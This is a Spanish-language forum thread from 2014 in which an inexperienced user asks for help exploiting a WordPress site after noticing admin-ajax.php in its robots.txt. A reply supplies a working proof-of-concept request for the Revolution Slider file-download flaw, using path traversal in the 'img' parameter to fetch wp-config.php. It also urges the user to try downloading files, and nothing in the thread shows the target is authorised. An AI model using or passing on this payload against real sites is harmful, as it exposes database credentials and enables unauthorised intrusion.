ayuda con este exploit

Iniciado por spinetta, 6 Noviembre 2014, 08:02 AM

0 Miembros y 1 Visitante están viendo este tema.

spinetta

Hola, estoy auditando una pagina web que utiliza word press 4.0, buscando en la famosa  base de datos de exploit me encontre con este, http://www.exploit-db.com/exploits/34511/
me llamo la atencion porque encontre una pagina que estaba prohibida en robotos.txt osea que esta pagina no quiere que los buscadores la encuentren, la pagina es wp-admin/admin-ajax.php   y en este exploit se hace mencion a ella.
otra cosa que me serviria , es que si no concen este exploit me digan otro que conozcan. Porque no tengo experiencia en el tema, Gracias !

ameise_1987

Estimado,

bajo los dorks se encuentra el poc del exploit,

http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

ésto nos dice que el parámetro vulnerable es img y desde ahí debes llamar los archivos para descargar, intentaste descargar algún archivo ?? .


saludos!.
firma retirada por insultar/cachondearse de (anelkaos) del staff.